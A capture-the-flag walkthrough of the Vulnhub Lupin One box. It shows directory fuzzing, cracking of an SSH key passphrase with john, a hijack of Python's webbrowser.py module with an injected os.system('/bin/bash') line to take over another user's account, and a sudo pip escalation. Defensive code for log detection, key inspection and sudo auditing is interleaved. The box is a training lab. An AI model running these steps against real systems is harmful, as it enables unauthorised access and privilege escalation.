Vulnhub Empire (Lupin One) box: detailed walkthrough


[03:22:02] 403 - 278B - /.htpasswd_test
[03:22:02] 403 - 278B - /.htaccess.save
[03:22:02] 403 - 278B - /.htaccessOLD2
[03:22:02] 403 - 278B - /.htaccess_sc
[03:22:02] 403 - 278B - /.htpasswds
[03:22:02] 403 - 278B - /.httr-oauth
[03:22:02] 403 - 278B - /.htm
[03:22:36] 301 - 314B - /image -> http://192.168.0.133/image/
[03:22:38] 301 - 319B - /javascript -> http://192.168.0.133/javascript/
[03:22:42] 301 - 315B - /manual -> http://192.168.0.133/manual/
[03:22:42] 200 - 208B - /manual/index.html
[03:22:55] 200 - 34B - /robots.txt
[03:22:56] 403 - 278B - /server-status/
[03:22:56] 403 - 278B - /server-status

Task Completed



The scan found robots.txt; it points at the ~myfiles directory, which contains nothing of interest, and other directory scanners turned up nothing useful here either.


![robots.txt contents](https://img-blog.csdnimg.cn/direct/9ab43c9cfeab440b91b8ab0eef82e469.png)`Visiting ~myfiles`  
 ![~myfiles directory](https://img-blog.csdnimg.cn/direct/d214019e63c94f9ba3f653a2263f5012.png)


### 4. The ffuf command


`ffuf is a web application fuzzer; it finds hidden content, directories and files quickly and flexibly.`



-u: target URL (the word FUZZ marks the position to substitute)
-c: colourised output
-r: follow redirects
-w: wordlist



┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://192.168.0.133/~FUZZ"

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v1.5.0 Kali Exclusive <3

:: Method : GET
:: URL : http://192.168.0.133/~FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500


secret [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 36ms]


`The secret directory was found; visit it.`  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/169b202ca6e246c9babc3adce2ba1168.png)



Hello friend, I'm very glad you found my secret directory. I created it like this to share my SSH private key file with you; it's hidden somewhere here so that hackers won't find it and won't use a fast track to crack my password. I'm smart, I know. Tell me if you have any questions. Your best friend, icex64

The note tells you to look for an SSH key, and that the user's name is icex64.


#### Continue scanning this directory with ffuf


Result: `.mysecret.txt`. In the output below, the long run of hits with an identical 331-byte body are the wordlist's comment and licence lines being matched against the same server response, so they are noise; the one response that differs is `mysecret.txt` (size 4689).



┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://192.168.0.133/~secret/.FUZZ" -e .txt,.bak,.html,.pub -mc 200

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v1.5.0 Kali Exclusive <3

:: Method : GET
:: URL : http://192.168.0.133/~secret/.FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
:: Extensions : .txt .bak .html .pub
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200


directory-list-2.3-small.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 4ms]

#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]

or send a letter to Creative Commons, 171 Second Street, .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]

#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]

#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]

Copyright 2007 James Fisher.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]

Copyright 2007 James Fisher [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]

#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]

Attribution-Share Alike 3.0 License. To view a copy of this .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]

#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]

Attribution-Share Alike 3.0 License. To view a copy of this .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]

Attribution-Share Alike 3.0 License. To view a copy of this .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]

or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]

Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]

or send a letter to Creative Commons, 171 Second Street, .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 20ms]

#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]

#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]

#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]

Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 18ms]

#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]

or send a letter to Creative Commons, 171 Second Street, .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 19ms]

#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]

This work is licensed under the Creative Commons .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]

directory-list-2.3-small.txt.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]

Attribution-Share Alike 3.0 License. To view a copy of this .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]

or send a letter to Creative Commons, 171 Second Street, .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

directory-list-2.3-small.txt.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 42ms]

This work is licensed under the Creative Commons .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]

Copyright 2007 James Fisher.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]

Copyright 2007 James Fisher.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 44ms]

directory-list-2.3-small.txt.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]

This work is licensed under the Creative Commons .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]

This work is licensed under the Creative Commons .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]

directory-list-2.3-small.txt.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]

Copyright 2007 James Fisher.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]

This work is licensed under the Creative Commons [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 50ms]

license, visit http://creativecommons.org/licenses/by-sa/3.0/ .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 51ms]

on atleast 3 different hosts [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]

on atleast 3 different hosts.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]

on atleast 3 different hosts.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]

Priority ordered case sensative list, where entries were found .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]

on atleast 3 different hosts.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

on atleast 3 different hosts.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]

#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 47ms]
mysecret.txt [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 56ms]
:: Progress: [438320/438320] :: Job [1/1] :: 938 req/sec :: Duration: [0:08:00] :: Errors: 0 ::
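The dirsearch and ffuf runs above leave a distinctive trace on the server side: one client (192.168.0.130 in this walkthrough) requesting dozens of distinct paths that all answer 403 or 404 within seconds, followed by the few paths that actually exist. The detection logic below is an added example, not part of this walkthrough: it parses Apache combined-format access-log lines, raises one alert per client that exceeds a threshold of distinct failed paths inside a sliding time window, and lists what that client discovered (the 200/301 paths such as /robots.txt). The log lines are constructed here to mirror the scan rather than taken from the box, and the window and threshold values are assumptions to be tuned per site.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip ident user [ts] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_bruteforce(lines, window_s=60, threshold=20, error_statuses=(403, 404)):
    """One alert per client that requests >= threshold distinct paths answered with an
    error status inside a sliding window of window_s seconds. The alert also lists the
    paths that did not fail, i.e. what the scan discovered (robots.txt, /manual/, ...)."""
    per_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        per_ip[rec["ip"]].append(rec)

    alerts = []
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        window, counts = deque(), Counter()
        crossed, peak = None, 0
        for r in recs:
            if r["status"] not in error_statuses:
                continue
            window.append(r)
            counts[r["path"]] += 1
            # Expire events older than the window before measuring.
            while r["ts"] - window[0]["ts"] > timedelta(seconds=window_s):
                old = window.popleft()
                counts[old["path"]] -= 1
                if counts[old["path"]] == 0:
                    del counts[old["path"]]
            peak = max(peak, len(counts))
            if len(counts) >= threshold and crossed is None:
                crossed = r["ts"]
        if crossed is not None:
            alerts.append({
                "ip": ip,
                "alert_at": crossed.isoformat(),
                "peak_distinct_failed_paths": peak,
                "discovered": sorted({r["path"] for r in recs if r["status"] not in error_statuses}),
            })
    return alerts


def build_sample_log():
    """Constructed log: one client probing 30 dotfile paths in 30 s (all 403), then hitting
    /robots.txt and /manual/, plus an ordinary visitor. Not taken from the box."""
    base = datetime(2024, 2, 7, 3, 22, 2, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} {size} "-" "{ua}"'
    lines = []

    def add(ip, sec, path, status, size, ua):
        ts = (base + timedelta(seconds=sec)).strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(fmt.format(ip=ip, ts=ts, path=path, status=status, size=size, ua=ua))

    scanner = "192.168.0.130"
    for i in range(30):
        add(scanner, i, f"/.htaccess_guess{i}", 403, 278, "dirsearch")
    add(scanner, 31, "/robots.txt", 200, 34, "dirsearch")
    add(scanner, 33, "/manual/", 301, 315, "dirsearch")
    for i, path in enumerate(["/", "/image/logo.png", "/index.html"]):
        add("192.168.0.50", i * 10, path, 200, 1024, "Mozilla/5.0")
    return "\n".join(lines)


if __name__ == "__main__":
    for alert in detect_bruteforce(build_sample_log().splitlines()):
        print(alert)
```

To run it against a real server, pass the open log file instead of the sample, e.g. `detect_bruteforce(open("/var/log/apache2/access.log"))`; the "discovered" list is the part worth triaging, because it tells you which of the probed paths the scanner actually got a useful answer for.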


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ec64a7789e1d4bb0a31f03c2cc690972.png)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/f382ca6e90bb469db2d7b0ca4f46159e.png)



> Base58-decode it: it is an SSH private key.


### 5. Cracking the SSH private key passphrase


#### 1. Write the private key into sh.txt


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/eead79469a054160b3b43fb95154cdcf.png)


#### 2. Convert the private key into a form john can crack



┌──(root㉿kali)-[~]
└─# /usr/bin/ssh2john sh.txt > hash


#### 3. Crack it with John



I had already cracked this one earlier.

┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)

┌──(root㉿kali)-[~]
└─# john --show hash
sh.txt:P@55w0rd!

1 password hash cracked, 0 left
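Two things in this part of the walkthrough lend themselves to a small tool: the base58 decoding of mysecret.txt, and the fact that the recovered key fell to a dictionary passphrase. What follows is an added example, not code from this walkthrough or from the box: a base58 codec (Bitcoin alphabet) plus a parser that reads only the header of an OpenSSH (openssh-key-v1) or legacy PEM private key and reports whether it is encrypted, which cipher and KDF protect it, and how many bcrypt rounds are used, so a key store can be audited without knowing any passphrase. The sample key header is constructed (header fields only, no key material), and the function names are mine.

```python
import base64
import struct

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text):
    """Decode Bitcoin-alphabet base58 (what the box used); whitespace/line wraps are ignored."""
    text = "".join(text.split())
    n = 0
    for ch in text:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid base58 character {ch!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    leading = len(text) - len(text.lstrip("1"))   # each leading '1' is a leading zero byte
    return b"\x00" * leading + body


def b58encode(data):
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58_ALPHABET[r] + out
    leading = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading + out


def _ssh_string(buf, off):
    """Read one SSH wire-format string (uint32 length prefix) from buf at off."""
    (n,) = struct.unpack_from(">I", buf, off)
    return bytes(buf[off + 4:off + 4 + n]), off + 4 + n


def inspect_private_key(pem):
    """Report how an SSH private key is protected, without needing its passphrase."""
    lines = [l.strip() for l in pem.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(magic)
        cipher, off = _ssh_string(blob, off)
        kdf, off = _ssh_string(blob, off)
        kdfopts, off = _ssh_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _ssh_string(kdfopts, 0)   # kdfoptions = string salt, uint32 rounds
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        info = {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    elif header.startswith("-----BEGIN ") and header.endswith("PRIVATE KEY-----"):
        # Legacy PEM: protection is announced in "Proc-Type" / "DEK-Info" header lines.
        hdrs = dict(l.split(":", 1) for l in lines[1:-1] if ":" in l)
        encrypted = "ENCRYPTED" in hdrs.get("Proc-Type", "")
        cipher = hdrs.get("DEK-Info", "none").split(",")[0].strip()
        info = {"format": "pem", "encrypted": encrypted, "cipher": cipher,
                "kdf": "EVP_BytesToKey(MD5, 1 iteration)" if encrypted else "none",
                "rounds": 1 if encrypted else None}
    else:
        raise ValueError("unrecognised private key header")
    if not info["encrypted"]:
        info["risk"] = "unencrypted: anyone who can read the file owns the identity"
    elif info["format"] == "pem":
        info["risk"] = "legacy PEM: single-iteration MD5 KDF, passphrase guesses are cheap"
    else:
        info["risk"] = "bcrypt-protected: security rests entirely on passphrase strength"
    return info


def make_sample_openssh_header(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Constructed test input: only the openssh-key-v1 header fields, no key material at all."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    kdfopts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = b"openssh-key-v1\x00" + s(cipher) + s(kdf) + s(kdfopts) + struct.pack(">I", 1)
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


if __name__ == "__main__":
    print(inspect_private_key(make_sample_openssh_header()))
    print(inspect_private_key(make_sample_openssh_header(cipher=b"none", kdf=b"none")))
```

On a real file the call is `inspect_private_key(open("id_rsa").read())`, or `inspect_private_key(b58decode(open("mysecret.txt").read()).decode())` for an encoded copy like the one on the box. The parser stops after the KDF options, so it never touches the encrypted payload; the useful output is the "risk" line, which separates keys that are simply unencrypted or legacy-PEM from keys whose only weakness is the passphrase the owner chose.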


### 6. SSH login with the private key



┌──(root㉿kali)-[~]
└─# ssh -i sh.txt icex64@192.168.0.133
Enter passphrase for key 'sh.txt':
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Wed Feb 7 00:46:39 2024 from 192.168.0.130
icex64@LupinOne:~$


### 7. Privilege escalation from icex64



sudo -l
It shows a Python file: user arsene may run heist.py through sudo without a password, so the idea is to spawn a new shell as arsene from inside that Python process.



icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User icex64 may run the following commands on LupinOne:
(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:~$ cat /home/arsene/heist.py
import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")


`heist.py imports the webbrowser module; locate that module.`






icex64@LupinOne:~$ find / -name webbrowser.py -type f 2>/dev/null
/usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$ head /usr/lib/python3.9/webbrowser.py
#! /usr/bin/env python3
"""Interfaces for launching and remotely controlling Web browsers."""
# Maintained by Georg Brandl.

import os
import shlex
import shutil
import sys
import subprocess

The module imports os, which suggests spawning a new shell with os.system("/bin/bash"): add that line to webbrowser.py (the file is writable by icex64) using the vi editor.



icex64@LupinOne:/tmp$ head -n 20 /usr/lib/python3.9/webbrowser.py
#! /usr/bin/env python3
"""Interfaces for launching and remotely controlling Web browsers."""
# Maintained by Georg Brandl.

import os
import shlex
import shutil
import sys
import subprocess
import threading

os.system("/bin/bash")
__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]


`With the line added, run the sudo command:`



icex64@LupinOne:/tmp$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/tmp$ id
uid=1000(arsene) gid=1000(arsene) groups=1000(arsene),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

We now have a shell as the arsene user.


### 8. Privilege escalation from arsene


`pip privilege escalation`  
 [**https://gtfobins.github.io/gtfobins/pip/**](https://gtfobins.github.io/gtfobins/pip/)



arsene@LupinOne:/tmp$ sudo -l
Matching Defaults entries for arsene on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User arsene may run the following commands on LupinOne:
(root) NOPASSWD: /usr/bin/pip
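Both escalations above come down to sudo rules: one lets icex64 run an interpreter on a script whose imported module (webbrowser.py) was writable, the other lets arsene run pip as root. The audit below is an added example, not code from the box or from this walkthrough: it parses `sudo -l` rule lines, flags targets that are interpreters or package managers (the kind of binary GTFOBins catalogues), and for Python script targets checks the script, its directory and every import it can resolve for group/other write bits or non-root ownership. The file layout in demo() is constructed in a temporary directory to mirror the box (a world-writable webbrowser.py beside a sane module); the interpreter list, the module search path and the function names are assumptions of this example.

```python
import ast
import re
import stat
import tempfile
from pathlib import Path

# One line of "sudo -l" output, e.g. "(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py"
SUDO_RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")
# Assumed list of commands that should never be sudo targets without a very good reason.
INTERPRETERS = re.compile(r"^(python[\d.]*|pip[\d.]*|perl|ruby|node|bash|sh|vi|vim)$")


def parse_rule(line):
    m = SUDO_RULE_RE.match(line.strip())
    if not m:
        return None
    tags = {t.rstrip(":") for t in m.group("tags").split()}
    return {"runas": m.group("runas"), "nopasswd": "NOPASSWD" in tags, "argv": m.group("cmd").split()}


def perm_findings(path, label):
    """Flag a file or directory a non-root user could modify: group/other-writable or not root-owned."""
    try:
        st = path.stat()
    except FileNotFoundError:
        return []
    out = []
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        out.append({"path": str(path), "reason": f"{label}: writable by group/other ({stat.filemode(st.st_mode)})"})
    if st.st_uid != 0:
        out.append({"path": str(path), "reason": f"{label}: not owned by root (uid {st.st_uid})"})
    return out


def top_level_imports(script):
    """Module names a script imports, found statically with ast (no execution)."""
    names = set()
    for node in ast.walk(ast.parse(script.read_text())):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def resolve_module(name, search_paths):
    for d in search_paths:
        for cand in (Path(d) / f"{name}.py", Path(d) / name / "__init__.py"):
            if cand.is_file():
                return cand
    return None


def audit_rule(line, search_paths):
    """Findings for one sudo rule: interpreter targets, and for Python scripts every file
    the interpreter will execute (the script, its directory, each resolvable import)."""
    rule = parse_rule(line)
    if not rule:
        return []
    findings = []
    exe = Path(rule["argv"][0])
    if INTERPRETERS.match(exe.name):
        findings.append({"path": str(exe), "reason": "command is an interpreter/package manager (see GTFOBins)"})
    for arg in rule["argv"][1:]:
        script = Path(arg)
        if script.suffix != ".py" or not script.is_file():
            continue
        findings += perm_findings(script, "script")
        findings += perm_findings(script.parent, "script directory (sys.path[0])")
        for mod in top_level_imports(script):
            target = resolve_module(mod, [script.parent, *search_paths])
            if target:
                findings += perm_findings(target, f"imported module {mod}")
    return findings


def demo():
    """Constructed layout mirroring the box: a world-writable webbrowser.py beside a sane module."""
    root = Path(tempfile.mkdtemp())
    lib, home = root / "lib", root / "home"
    lib.mkdir()
    home.mkdir()
    (lib / "webbrowser.py").write_text("import os\n")
    (lib / "webbrowser.py").chmod(0o666)          # the weakness section 7 relied on
    (lib / "safe.py").write_text("X = 1\n")
    (lib / "safe.py").chmod(0o644)
    script = home / "heist.py"
    script.write_text("import webbrowser\nimport safe\nprint('Its not yet ready to get in action')\n")
    script.chmod(0o644)
    rules = [f"(arsene) NOPASSWD: /usr/bin/python3.9 {script}", "(root) NOPASSWD: /usr/bin/pip"]
    return [f for rule in rules for f in audit_rule(rule, [lib])]


if __name__ == "__main__":
    for f in demo():
        print(f["path"], "-", f["reason"])
```

On a real host the rule lines come from `sudo -l` for each account and the search path from `python3 -c "import sys; print(sys.path)"` for the interpreter named in the rule. The fix for the two findings this box shows is the same in both cases: restore root ownership and 0644 on the standard library, and replace rules that hand a user an interpreter or pip with a rule for one specific, non-writable wrapper script.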


